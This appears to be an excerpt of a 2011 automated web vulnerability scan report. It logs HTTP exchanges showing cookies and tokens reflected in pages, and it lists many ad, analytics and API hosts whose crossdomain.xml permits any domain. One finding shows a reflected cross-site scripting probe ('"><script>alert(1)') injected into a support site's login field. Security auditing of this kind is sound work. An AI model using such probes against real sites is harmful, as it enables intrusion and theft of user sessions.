GET /pnews/773204/i/7269/pp/2 Host: www.marketgid.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MGformStatus=2; __utma=250877338 Referer: http://www.google.com |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:33:37 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Keep-Alive: timeout=20 Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT Cache-Control: no-cache, must-revalidate Content-Length: 48806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <div id="mgnvgfd5yref" style="display:none">http ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:36:17 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=23 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25227 if(typeof(COMSCORE)!= ...[SNIP]... 81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:36:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=23 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25227 if(typeof(COMSCORE)!= ...[SNIP]... ={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:32 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... 84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:29 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:28 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... Apr 24 16:50:29 2011&prad=253732016&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:27 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc COMSCORE.BMX.Broker "urlExcludeList": "http://photobucket.com/$ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:28 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... onload); }}}}}},f:[],done:false ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:23:30 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=22 Set-Cookie: BMX_G=method->-1,ts- Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25132 if(typeof(COMSCORE)!= ...[SNIP]... ne:false,timer:null};})() ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://forums.manage |
Path: | /fbw |
GET /fbw?fbwId=49000004360353 HTTP/1.1 Host: forums.manageengine.com Proxy-Connection: keep-alive Referer: http://www.manageengine User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=208542606 |
HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 25 Apr 2011 12:12:05 GMT Server: Apache-Coyote/1.1 Content-Length: 25959 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <link href="//css.zohostat ...[SNIP]... <input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://forums.manage |
Path: | /fbw |
GET /fbw?fbwId=49000004360353 HTTP/1.1 Host: forums.manageengine.com Proxy-Connection: keep-alive Referer: http://www.manageengine User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=208542606 |
HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 25 Apr 2011 12:12:06 GMT Server: Apache-Coyote/1.1 Content-Length: 25914 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <link href="//css.zohostat ...[SNIP]... <script> //For I18N var zuid = "-1"; var csrfParamName = "zdrpn"; var csrfToken = "067f90c3-40d8-4a59-bdeb var i18n = new Array(); i18n["zohodiscussions i18n["zohodiscussions ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.trust |
Path: | /index.php |
GET /index.php?_m=knowle Host: support.trust-guard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SWIFT_loginpassword |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:49:50 GMT Server: Apache/1.3.41 Ben-SSL/1.59 X-Powered-By: PHP/5.2.17 Set-Cookie: SWIFT_sessionid40=deleted Set-Cookie: SWIFT_sessionid40 Connection: close Content-Type: text/html Content-Length: 20833 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e ...[SNIP]... <input type="text" name="loginemail" value="deleted48cca"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.trust |
Path: | /visitor/index.php |
GET /visitor/index.php?_m Host: support.trust-guard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SWIFT_loginpassword |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:48:34 GMT Server: Apache/1.3.41 Ben-SSL/1.59 Cache-Control: max-age=3600, must-revalidate Expires: Tue, 26 Apr 2011 19:48:37 GMT X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/javascript Content-Length: 11543 //======================= // Kayako LiveResponse // Copyright (c) 2001-2011 // http://www.kayako.com // License: http://www.kayako.com //======================= var sessionid_tbpeip8i = "36r5tssjo8ljsterx8m var country_tbpeip8i = ""; var countrycode_tbpeip8i = ""; var hasnotes_tbpeip8i = ""; var campaignid_tbpeip8i = ""; var campaigntitle_tbpeip8i = ""; var isfirsttime_tbpeip8i = 1; var timer_tbpeip8i ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://195.68.160.134 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 195.68.160.134 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:25:37 GMT Content-Type: text/xml; charset=windows-1251 Content-Length: 208 Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT Connection: close Expires: Mon, 25 Apr 2011 15:25:37 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://195.68.160.166 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 195.68.160.166 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:26:43 GMT Content-Type: text/xml; charset=windows-1251 Content-Length: 208 Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT Connection: close Expires: Mon, 25 Apr 2011 15:26:43 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://195.68.160.167 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 195.68.160.167 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:25:38 GMT Content-Type: text/xml; charset=windows-1251 Content-Length: 208 Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT Connection: close Expires: Mon, 25 Apr 2011 15:25:38 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://195.68.160.40 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 195.68.160.40 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:25:57 GMT Content-Type: text/xml; charset=windows-1251 Content-Length: 208 Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT Connection: close Expires: Mon, 25 Apr 2011 15:25:57 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://195.68.160.95 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 195.68.160.95 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:25:41 GMT Content-Type: text/xml; charset=windows-1251 Content-Length: 208 Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT Connection: close Expires: Mon, 25 Apr 2011 15:25:41 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.vimeocdn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.vimeocdn.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 07 Apr 2011 23:28:46 GMT ETag: "157-78810780" Content-Type: application/xml Cache-Control: max-age=1990877 Expires: Wed, 18 May 2011 17:04:49 GMT Date: Mon, 25 Apr 2011 16:03:32 GMT Content-Length: 343 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.afy11.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.afy11.net |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT Accept-Ranges: bytes ETag: "e732374a5649c71:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 25 Apr 2011 14:37:55 GMT Connection: close Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT Date: Mon, 25 Apr 2011 14:31:42 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ajax.googleapis |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com |
HTTP/1.0 200 OK Expires: Mon, 25 Apr 2011 21:17:49 GMT Date: Sun, 24 Apr 2011 21:17:49 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 68752 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.facebook.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=2592000 Content-Type: application/xml Expires: Wed, 25 May 2011 15:17:38 GMT X-FB-Server: 10.32.72.125 Connection: close Content-Length: 280 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <site- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.flickr.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.flickr.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:41:32 GMT P3P: policyref="http://p3p Vary: Accept-Encoding X-Served-By: www146.flickr.mud.yahoo Cache-Control: private Content-Length: 265 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.voicefive.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Tue, 26 Apr 2011 14:23:30 GMT Date: Mon, 25 Apr 2011 14:23:30 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://beacon.secure |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: beacon.securestudies.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Tue, 26 Apr 2011 14:50:23 GMT Date: Mon, 25 Apr 2011 14:50:23 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.mail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bs.mail.ru |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:29:05 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT Content-Type: application/xml Expires: Mon, 25 Apr 2011 15:29:05 GMT Content-Length: 100 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.yandex.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bs.yandex.ru |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:30:37 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT Content-Type: application/xml Expires: Mon, 25 Apr 2011 15:30:37 GMT Content-Length: 100 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn-01.yumene |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn-01.yumenetworks.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 ETag: "182c001-122-454adb8 Accept-Ranges: bytes Content-Type: application/xml Age: 121191 Date: Mon, 25 Apr 2011 14:54:12 GMT Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT Content-Length: 290 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://click-here-to |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: click-here-to-listen.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:54:10 GMT Server: dg-httpd/5.0.29 (1273399797) Accept-Ranges: bytes Connection: close Content-Type: text/xml Last-Modified: Mon, 28 Apr 2008 18:04:40 GMT ETag: "45a737ce-1e1-481611b8" Content-Length: 481 <cross-domain-policy> <!-- Place top level domain name --> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*" to-ports="80,443"/> <allow-http-request ...[SNIP]... <allow-access-from domain="*.*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*" to-ports="80,443" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://counter.rambler.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: counter.rambler.ru |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 14:27:04 GMT Expires: Mon, 25 Apr 2011 14:37:04 GMT Content-type: text/plain Content-length: 288 Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> <cross-domain-policy> <allow-access-from domain="*" to-ports="80" secure="true" /> <allow-ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d1.openx.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d1.openx.org |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:07:21 GMT Server: Apache Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT ETag: "1bed79-c7-48f142a249100" Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 248 Content-Type: application/xml ETag: "3a9d108-f8-46a2ad4ab2800 X-Varnish: 619922229 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=931 Date: Mon, 25 Apr 2011 15:14:04 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: event.adxpose.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"203-1302122676000" Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT Content-Type: application/xml Content-Length: 203 Date: Mon, 25 Apr 2011 14:23:41 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://games.mochiads.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: games.mochiads.com |
HTTP/1.0 200 OK Server: nginx Content-Type: text/xml Content-Length: 213 Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT P3P: policyref="http://www X-Permitted-Cross-Domain User-Header: X-Permitted-Cross-Domain X-MochiAds-Server: 38.102.129.47:80 Accept-Ranges: bytes X-Mochi-Backend: 10.0.0.105:40049 X-Mochi-Source: 10.0.0.238:27050 Date: Mon, 25 Apr 2011 14:45:26 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" to-ports="80" /> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://goods.adnectar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: goods.adnectar.com |
